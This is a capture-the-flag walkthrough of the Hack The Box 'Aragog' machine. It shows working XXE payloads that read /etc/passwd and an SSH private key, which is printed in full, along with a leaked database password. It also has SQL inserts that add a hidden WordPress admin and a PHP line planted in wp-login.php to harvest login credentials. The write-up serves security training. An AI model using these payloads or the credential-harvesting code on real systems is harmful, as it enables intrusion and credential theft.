A good system enumeration is as usual needed here. Nmap scan -> FTP enum -> Fuzzing -> Web Enum.

That will logically lead to Burp once php & txt files have been discovered, and then exploiting the XML External Entity (XXE).

Once connected, Database credentials can be found, but reveal to be a rabbit hole, as this not leads me to useful informations. Get back to system enumeration and I have discovered the pspy tool that clearly ease the processes stalking step to grab the so much desired root.txt file.


ENUMERATION

NMAP

Start with a full nmap scan, as usual with Script Scan (-sC) and version detection (-sV) on the whole port range (-p-).

nvko@kali-oscp:~$ nmap -sC -sV -oA nmap-aragog 10.10.10.78 -p-
                Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-29 15:44 WAT
        Nmap scan report for 10.10.10.78
        Host is up (0.020s latency).
        Not shown: 65532 closed ports
        PORT   STATE SERVICE VERSION
        21/tcp open  ftp     vsftpd 3.0.3
        | ftp-anon: Anonymous FTP login allowed (FTP code 230)
        |_-r--r--r--    1 ftp      ftp            86 Dec 21 16:30 test.txt
        | ftp-syst: 
        |   STAT: 
        | FTP server status:
        |      Connected to ::ffff:10.10.14.25
        |      Logged in as ftp
        |      TYPE: ASCII
        |      No session bandwidth limit
        |      Session timeout in seconds is 300
        |      Control connection is plain text
        |      Data connections will be plain text
        |      At session startup, client count was 3
        |      vsFTPd 3.0.3 - secure, fast, stable
        |_End of status
        22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
        | ssh-hostkey: 
        |   2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)
        |   256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)
        |_  256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)
        80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
        |_http-server-header: Apache/2.4.18 (Ubuntu)
        |_http-title: Apache2 Ubuntu Default Page: It works
        Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

FTP

Check if FTP allows Anonymous login.

root@kali-oscp:~/htb/machines/aragog# ftp 10.10.10.78
    Connected to 10.10.10.78.
    220 (vsFTPd 3.0.3)
    Name (10.10.10.78:root): anonymous
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
ftp> dir
        200 PORT command successful. Consider using PASV.
        150 Here comes the directory listing.
        -r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
        226 Directory send OK.

ftp> get test.txt<br>
ftp> exit<br>

root@kali-oscp:~/htb/machines/aragog# cat test.txt

    <details>
        <subnet_mask>255.255.255.192</subnet_mask>
        <test></test>
    </details>

So the only interesting informations are:
- this a a /26 netmask
- mput on the FTP server is disabled
- test.txt is a basic xml file

HOSTS

Begin with adding the machine to my /etc/hosts

10.10.10.78 aragog aragog.htb


FUZZING

root@kali:/usr/share/wordlists/dirb# dirbuster -u http://10.10.10.78/ -l /usr/share/wordlists/dirb/small.txt 
        Starting OWASP DirBuster 1.0-RC1
        Starting dir/file list based brute forcing
        Dir found: / - 200
        Dir found: /icons/ - 403
        Dir found: /icons/small/ - 403
        File found: /hosts.php - 200
        Dir found: /server-status/ - 403

Ok, so this quantity of hosts refers to a /0 netmask.

root@kali # ipcalc 0.0.0.0/0
    Address:   0.0.0.0              00000000.00000000.00000000.00000000
    Netmask:   0.0.0.0 = 0          00000000.00000000.00000000.00000000
    Wildcard:  255.255.255.255      11111111.11111111.11111111.11111111
    =>
    Network:   0.0.0.0/0            00000000.00000000.00000000.00000000
    HostMin:   0.0.0.1              00000000.00000000.00000000.00000001
    HostMax:   255.255.255.254      11111111.11111111.11111111.11111110
    Broadcast: 255.255.255.255      11111111.11111111.11111111.11111111
    Hosts/Net: 4294967294            Class A, In Part Private Internet


EXPLOITATION

XML External Entity (XXE) Processing

So there must be a link between both file hosts.php & test.txt. Let's try to inject content of the test.txt file in a POST to the hosts.php.
1- Start Burp Suite Community Edition
2- “Proxy” tab -> Intercept on
3- Start firefox & configure local burp a the proxy
4- Firefox: go to http://10.10.10.78/hosts.php
5- Burp: Action -> Send to Repeater
6- “Repeater” tab
7- Beside the actual Request:
  modify the request type from GET to POST
  paste the content of the test.txt file
  * Go

It seems we can craft a request to exploit external entity(XXE) that will allow us to read files on the system.



Replace the content of the test.txt by:

<!DOCTYPE root [<!ENTITY foo SYSTEM "file:///etc/passwd">]> 
                <details>
                    <subnet_mask>&foo;</subnet_mask>
                    <test></test>
                </details>

Will show the content of the /etc/passwd of the server

...
    saned:x:119:127::/var/lib/saned:/bin/false
    usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
    florian:x:1000:1000:florian,,,:/home/florian:/bin/bash
    cliff:x:1001:1001::/home/cliff:/bin/bash
    mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
    sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
    ftp:x:123:130:ftp daemon,,,:/srv/ftp:/bin/false

So we have 2 interesting users: florian & cliff


USER FLAG

Let's first try to find the flag file.

<!DOCTYPE root [<!ENTITY foo SYSTEM "file:///home/florian/user.txt">]> 
                <details>
                    <subnet_mask>&foo;</subnet_mask>
                    <test></test>
                </details>

f43bdfbcf.................................


SSH CONNECTION

When I try to connect via ssh it says that I can only connect with pub_key.

nvko@kali-oscp:~/htb/machines/aragog$ ssh florian@10.10.10.78
    The authenticity of host '10.10.10.78 (10.10.10.78)' can't be established.
    ECDSA key fingerprint is SHA256:phu0FjQg/9nCmL2014AJ9yH4akvraA7Ea5QtE59wqD4.
    Are you sure you want to continue connecting (yes/no)? yes
    Warning: Permanently added '10.10.10.78' (ECDSA) to the list of known hosts.
    florian@10.10.10.78: Permission denied (publickey).



So lets found the key. Inject these into the POST request.



>Pub key

<!DOCTYPE root [<!ENTITY foo SYSTEM "file:///home/florian/.ssh/id_rsa.pub">]> 
                <details>
                    <subnet_mask>&foo;</subnet_mask>
                    <test></test>
                </details>
             There are 4294967294 possible hosts for ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnQNC2Y4/vyAtmQGMn8lwLmCawjbX608ffCO8sAdoUyZ/uPh35hAQxsSD7KOPr/JvEkCwXyXaRSF+Tnot2mYLeZ/+w7iuian042SX1Hhy7k4Hl5/yUCM6Drt3FYijvtJOphmtZRWdDifx0obhNv/Prv6BPRH2UP1zQ+FnBGwVCPxooUWfVHUHyf397U8HQAnzU8/EJzdGlUl3BurwEtmtVco2yD5IFR1sFlzesELzUqV7YIH4jHz0dDd14EIvcSlFehhVBngS4KwOjtSULxhKgQGBXHgiBAJbHfi1cKZ7lwlr9Ql13guSy3jDiym1gwfPOyGZQOuSsMkOrqiUvgXIr florian@aragog.htb



>Priv key

<!DOCTYPE root [<!ENTITY foo SYSTEM "file:///home/florian/.ssh/id_rsa">]> 
                <details>
                    <subnet_mask>&foo;</subnet_mask>
                    <test></test>
                </details>
There are 4294967294 possible hosts for -----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA50DQtmOP78gLZkBjJ/JcC5gmsI21+tPH3wjvLAHaFMmf7j4d
+YQEMbEg+yjj6/ybxJAsF8l2kUhfk56LdpmC3mf/sO4romp9ONkl9R4cu5OB5ef8
lAjOg67dxWIo77STqYZrWUVnQ4n8dKG4Tb/z67+gT0R9lD9c0PhZwRsFQj8aKFFn
1R1B8n9/e1PB0AJ81PPxCc3RpVJdwbq8BLZrVXKNsg+SBUdbBZc3rBC81Kle2CB+
Ix89HQ3deBCL3EpRXoYVQZ4EuCsDo7UlC8YSoEBgVx4IgQCWx34tXCme5cJa/UJd
d4Lkst4w4sptYMHzzshmUDrkrDJDq6olL4FyKwIDAQABAoIBAAxwMwmsX0CRbPOK
AQtUANlqzKHwbVpZa8W2UE74poc5tQ12b9xM2oDluxVnRKMbyjEPZB+/aU41K1bg
TzYI2b4mr90PYm9w9N1K6Ly/auI38+Ouz6oSszDoBeuo9PS3rL2QilOZ5Qz/7gFD
9YrRCUij3PaGg46mvdJLmWBGmMjQS+ZJ7w1ouqsIANypMay2t45v2Ak+SDhl/SDb
/oBJFfnOpXNtQfJZZknOGY3SlCWHTgMCyYJtjMCW2Sh2wxiQSBC8C3p1iKWgyaSV
0qH/3gt7RXd1F3vdvACeuMmjjjARd+LNfsaiu714meDiwif27Knqun4NQ+2x8JA1
sWmBdcECgYEA836Z4ocK0GM7akW09wC7PkvjAweILyq4izvYZg+88Rei0k411lTV
Uahyd7ojN6McSd6foNeRjmqckrKOmCq2hVOXYIWCGxRIIj5WflyynPGhDdMCQtIH
zCr9VrMFc7WCCD+C7nw2YzTrvYByns/Cv+uHRBLe3S4k0KNiUCWmuYsCgYEA8yFE
rV5bD+XI/iOtlUrbKPRyuFVUtPLZ6UPuunLKG4wgsGsiVITYiRhEiHdBjHK8GmYE
tkfFzslrt+cjbWNVcJuXeA6b8Pala7fDp8lBymi8KGnsWlkdQh/5Ew7KRcvWS5q3
HML6ac06Ur2V0ylt1hGh/A4r4YNKgejQ1CcO/eECgYEAk02wjKEDgsO1avoWmyL/
I5XHFMsWsOoYUGr44+17cSLKZo3X9fzGPCs6bIHX0k3DzFB4o1YmAVEvvXN13kpg
ttG2DzdVWUpwxP6PVsx/ZYCr3PAdOw1SmEodjriogLJ6osDBVcMhJ+0Y/EBblwW7
HF3BLAZ6erXyoaFl1XShozcCgYBuS+JfEBYZkTHscP0XZD0mSDce/r8N07odw46y
kM61To2p2wBY/WdKUnMMwaU/9PD2vN9YXhkTpXazmC0PO+gPzNYbRe1ilFIZGuWs
4XVyQK9TWjI6DoFidSTGi4ghv8Y4yDhX2PBHPS4/SPiGMh485gTpVvh7Ntd/NcI+
7HU1oQKBgQCzVl/pMQDI2pKVBlM6egi70ab6+Bsg2U20fcgzc2Mfsl0Ib5T7PzQ3
daPxRgjh3CttZYdyuTK3wxv1n5FauSngLljrKYXb7xQfzMyO0C7bE5Rj8SBaXoqv
uMQ76WKnl3DkzGREM4fUgoFnGp8fNEZl5ioXfxPiH/Xl5nStkQ0rTA==
-----END RSA PRIVATE KEY-----



Putting both keys into files named florian.pub & florian.priv

nvko@kali-oscp:~$ chmod 0600 florian.*
nvko@kali-oscp:~$ ssh -i florian.priv florian@10.10.10.78

-> Connected :-)


OS ENUMERATION

LinEnum & some manual Enum

nvko@kali-oscp:~$scp -i florian.priv /root/tools/LinEnum.sh florian@10.10.10.78:/home/florian/
florian@aragog:$ chmod +x LinEnum.sh
florian@aragog:$ ./LinEnum.sh
...
    /var/www/html/dev_wiki    <- wordpress with “cliff” as owner
    /var/www/html/dev_wiki/wp-includes/SimplePie <- looks interesting
...
    /var/www/html:
        total 32K
        drwxrwxrwx 4 www-data www-data 4.0K May 30 00:40 .
        drwxr-xr-x 3 root     root     4.0K Dec 18 16:36 ..
        drwxrwxrwx 5 cliff    cliff    4.0K May 30 00:40 dev_wiki
        -rw-r--r-- 1 www-data www-data  689 Dec 21 15:31 hosts.php
        -rw-r--r-- 1 www-data www-data  12K Dec 18 16:36 index.html
        drw-r--r-- 5 cliff    cliff    4.0K Dec 20 16:17 zz_backup
...
    root        936  0.0  0.1  24044  1592 ?        Ss   May27   0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
    mysql       958  0.0 14.0 1119988 138156 ?      Ssl  May27   1:41 /usr/sbin/mysqld
...



TL;DR
- cliff is the owner of the /var/www/dev_wiki folder
- this folder permissions is 777
- we have a MariaDB database on the regular 3306 tcp port
- /var/www/html/dev_wiki/wp-config.php is containing DB credentials

MYSQL ENUMERATION

mysql -u root -p  (password => $@y6CHJ^$#5c37j$#6h)
mysql> select * from wp_users;
        +----+---------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+---------------+
        | ID | user_login    | user_pass                          | user_nicename | user_email      | user_url | user_registered     | user_activation_key | user_status | display_name  |
        +----+---------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+---------------+
        |  1 | Administrator | $P$B3FUuIdSDW0IaIc4vsjj.NzJDkiscu. | administrator | it@megacorp.com |          | 2017-12-20 23:26:04 |                     |           0 | Administrator |
        +----+---------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+---------------+
mysql> select * from wp_posts;
...
|  1 |           1 | 2017-12-20 23:26:04 | 2017-12-20 23:26:04 | Hi Florian,
Thought we could use a wiki.  Feel free to log in and have a poke around - but as I'm messing about with a lot of changes I'll probably be restoring the site from backup fairly frequently!
I'll be logging in regularly and will email the wider team when I need some more testers ;-)
Cliff 
...


CREATE WORDPRESS ACCOUNT

As we are admin on the MariaDB database, we can create an admin user for the wordpress CMS.

mysql> INSERT INTO wp_wiki.`wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('4', 'demo', MD5('demo'), 'Your Name', 'test@yourdomain.com', 'http://www.test.com/', '2011-06-07 00:00:00', '', '0', 'Your Name');
mysql> INSERT INTO wp_wiki.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '4', 'wp_user_level', '10');
mysql> INSERT INTO `databasename`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '4', 'wp_capabilities', 'a:1:{s:13:"administrator";s:1:"1";}');



Now it is working, I can login into the Wordpress: http://aragog/dev_wiki/wp-admin (demo/demo)

BUT, my credentials is no more usable after a few minutes. It seems that there is some script that restore a previous state of the wordpress ...


PROCESSES STALKING

Upload pspy on the host to stalk recurrent running processes.

root@kali-oscp:~/personnel_nvko/tools# scp -r -i ../htb/machines/aragog/florian.priv processes/pspy64  florian@10.10.10.78:/home/florian/


Running pspy, show this every single minute.

Ok, so as this script is certainly using wp-login.php to connect on the wordpress interface. We will simply have to edit the wp-login.php login page, to extract credentials provided by the wp-login.py script


To intercept these credentials, add the following at the beginning of the wp-login.php file. At least after the "<?php" tag

$file='/tmp/credentials.txt';
file_put_contents($file,$_POST);


Wait 1 minute, then ...

This credentials allows to connect on wordpress blog as Administrator, and to escalate from florian to root shell.